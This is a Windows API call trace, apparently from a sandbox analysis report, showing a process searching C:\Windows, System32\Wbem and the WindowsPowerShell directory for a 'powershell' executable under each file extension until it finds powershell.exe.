	[0418.328] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c70d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0418.328] SetErrorMode (uMode=0x1) returned 0x1
	[0418.328] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.CMD", lpFindFileData=0x1c70d940 | out: lpFindFileData=0x1c70d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0418.329] SetErrorMode (uMode=0x1) returned 0x1
	[0418.329] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c70d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0418.329] SetErrorMode (uMode=0x1) returned 0x1
	[0418.329] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBS", lpFindFileData=0x1c70d940 | out: lpFindFileData=0x1c70d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0418.329] SetErrorMode (uMode=0x1) returned 0x1
	[0418.329] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c70d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0418.329] SetErrorMode (uMode=0x1) returned 0x1
	[0418.329] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBE", lpFindFileData=0x1c70d940 | out: lpFindFileData=0x1c70d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0418.330] SetErrorMode (uMode=0x1) returned 0x1
	[0418.330] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c70d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0418.330] SetErrorMode (uMode=0x1) returned 0x1
	[0418.330] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JS", lpFindFileData=0x1c70d940 | out: lpFindFileData=0x1c70d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0418.330] SetErrorMode (uMode=0x1) returned 0x1
	[0418.330] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c70d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0418.330] SetErrorMode (uMode=0x1) returned 0x1
	[0418.330] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JSE", lpFindFileData=0x1c70d940 | out: lpFindFileData=0x1c70d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0418.331] SetErrorMode (uMode=0x1) returned 0x1
	[0418.331] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c70d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0418.331] SetErrorMode (uMode=0x1) returned 0x1
	[0418.331] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSF", lpFindFileData=0x1c70d940 | out: lpFindFileData=0x1c70d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0418.331] SetErrorMode (uMode=0x1) returned 0x1
	[0418.331] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c70d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0418.331] SetErrorMode (uMode=0x1) returned 0x1
	[0418.331] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSH", lpFindFileData=0x1c70d940 | out: lpFindFileData=0x1c70d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0418.332] SetErrorMode (uMode=0x1) returned 0x1
	[0418.332] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c70d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0418.332] SetErrorMode (uMode=0x1) returned 0x1
	[0418.332] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.MSC", lpFindFileData=0x1c70d940 | out: lpFindFileData=0x1c70d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0418.332] SetErrorMode (uMode=0x1) returned 0x1
	[0418.332] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c70d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0418.332] SetErrorMode (uMode=0x1) returned 0x1
	[0418.333] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell", lpFindFileData=0x1c70d940 | out: lpFindFileData=0x1c70d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0418.333] SetErrorMode (uMode=0x1) returned 0x1
	[0418.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c70d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0418.333] SetErrorMode (uMode=0x1) returned 0x1
	[0418.333] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.ps1", lpFindFileData=0x1c70d940 | out: lpFindFileData=0x1c70d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0418.333] SetErrorMode (uMode=0x1) returned 0x1
	[0418.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c70d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0418.334] SetErrorMode (uMode=0x1) returned 0x1
	[0418.334] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psm1", lpFindFileData=0x1c70d940 | out: lpFindFileData=0x1c70d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0418.334] SetErrorMode (uMode=0x1) returned 0x1
	[0418.334] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c70d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0418.598] SetErrorMode (uMode=0x1) returned 0x1
	[0418.598] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psd1", lpFindFileData=0x1c70d940 | out: lpFindFileData=0x1c70d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0418.599] SetErrorMode (uMode=0x1) returned 0x1
	[0418.599] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c70d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0418.599] SetErrorMode (uMode=0x1) returned 0x1
	[0418.599] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.COM", lpFindFileData=0x1c70d940 | out: lpFindFileData=0x1c70d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0418.599] SetErrorMode (uMode=0x1) returned 0x1
	[0418.599] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c70d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0418.600] SetErrorMode (uMode=0x1) returned 0x1
	[0418.600] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.EXE", lpFindFileData=0x1c70d940 | out: lpFindFileData=0x1c70d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0418.600] SetErrorMode (uMode=0x1) returned 0x1
	[0418.600] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c70d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0418.600] SetErrorMode (uMode=0x1) returned 0x1
	[0418.600] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.BAT", lpFindFileData=0x1c70d940 | out: lpFindFileData=0x1c70d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0418.601] SetErrorMode (uMode=0x1) returned 0x1
	[0418.601] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c70d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0418.601] SetErrorMode (uMode=0x1) returned 0x1
	[0418.601] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.CMD", lpFindFileData=0x1c70d940 | out: lpFindFileData=0x1c70d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0418.601] SetErrorMode (uMode=0x1) returned 0x1
	[0418.602] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c70d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0418.602] SetErrorMode (uMode=0x1) returned 0x1
	[0418.602] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBS", lpFindFileData=0x1c70d940 | out: lpFindFileData=0x1c70d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0418.602] SetErrorMode (uMode=0x1) returned 0x1
	[0418.602] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c70d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0418.602] SetErrorMode (uMode=0x1) returned 0x1
	[0418.602] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBE", lpFindFileData=0x1c70d940 | out: lpFindFileData=0x1c70d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0418.603] SetErrorMode (uMode=0x1) returned 0x1
	[0418.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c70d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0418.603] SetErrorMode (uMode=0x1) returned 0x1
	[0418.603] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JS", lpFindFileData=0x1c70d940 | out: lpFindFileData=0x1c70d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0418.603] SetErrorMode (uMode=0x1) returned 0x1
	[0418.604] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c70d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0418.604] SetErrorMode (uMode=0x1) returned 0x1
	[0418.604] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JSE", lpFindFileData=0x1c70d940 | out: lpFindFileData=0x1c70d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0418.604] SetErrorMode (uMode=0x1) returned 0x1
	[0418.604] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c70d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0418.604] SetErrorMode (uMode=0x1) returned 0x1
	[0418.604] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSF", lpFindFileData=0x1c70d940 | out: lpFindFileData=0x1c70d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0418.605] SetErrorMode (uMode=0x1) returned 0x1
	[0418.605] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c70d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0418.605] SetErrorMode (uMode=0x1) returned 0x1
	[0418.605] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSH", lpFindFileData=0x1c70d940 | out: lpFindFileData=0x1c70d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0418.605] SetErrorMode (uMode=0x1) returned 0x1
	[0418.606] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c70d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0418.606] SetErrorMode (uMode=0x1) returned 0x1
	[0418.606] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.MSC", lpFindFileData=0x1c70d940 | out: lpFindFileData=0x1c70d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0418.606] SetErrorMode (uMode=0x1) returned 0x1
	[0418.606] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c70d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0418.606] SetErrorMode (uMode=0x1) returned 0x1
	[0418.607] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", lpFindFileData=0x1c70d940 | out: lpFindFileData=0x1c70d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0418.607] SetErrorMode (uMode=0x1) returned 0x1
	[0418.607] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c70d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0418.607] SetErrorMode (uMode=0x1) returned 0x1
	[0418.607] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c70d940 | out: lpFindFileData=0x1c70d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0418.608] SetErrorMode (uMode=0x1) returned 0x1
	[0418.608] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c70d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0418.608] SetErrorMode (uMode=0x1) returned 0x1
	[0418.608] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c70d940 | out: lpFindFileData=0x1c70d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0418.608] SetErrorMode (uMode=0x1) returned 0x1
	[0418.608] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c70d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0418.609] SetErrorMode (uMode=0x1) returned 0x1
	[0418.609] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c70d940 | out: lpFindFileData=0x1c70d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0418.609] SetErrorMode (uMode=0x1) returned 0x1
	[0418.609] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c70d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0418.609] SetErrorMode (uMode=0x1) returned 0x1
	[0418.609] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c70d940 | out: lpFindFileData=0x1c70d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0418.610] SetErrorMode (uMode=0x1) returned 0x1
	[0418.610] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c70d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0418.610] SetErrorMode (uMode=0x1) returned 0x1
	[0418.610] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c70d940 | out: lpFindFileData=0x1c70d940*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x1976e0
	[0418.611] FindNextFileW (in: hFindFile=0x1976e0, lpFindFileData=0x1c70d950 | out: lpFindFileData=0x1c70d950*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0418.611] FindClose (in: hFindFile=0x1976e0 | out: hFindFile=0x1976e0) returned 1
	[0418.612] SetErrorMode (uMode=0x1) returned 0x1
